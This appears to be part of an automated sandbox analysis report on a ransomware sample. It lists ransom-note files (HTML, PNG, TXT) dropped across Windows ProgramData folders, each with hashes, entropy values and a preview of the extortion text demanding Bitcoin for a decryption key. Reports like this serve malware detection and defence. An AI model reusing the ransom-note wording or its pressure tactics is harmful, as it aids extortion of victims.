                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\GameExplorer\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\GameExplorer\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\GameExplorer\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\LfSvc\Cache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\LfSvc\Cache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\LfSvc\Cache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\LfSvc\Geofence\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\LfSvc\Geofence\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\LfSvc\Geofence\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\LfSvc\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\LfSvc\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\LfSvc\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Parental Controls\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Parental Controls\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
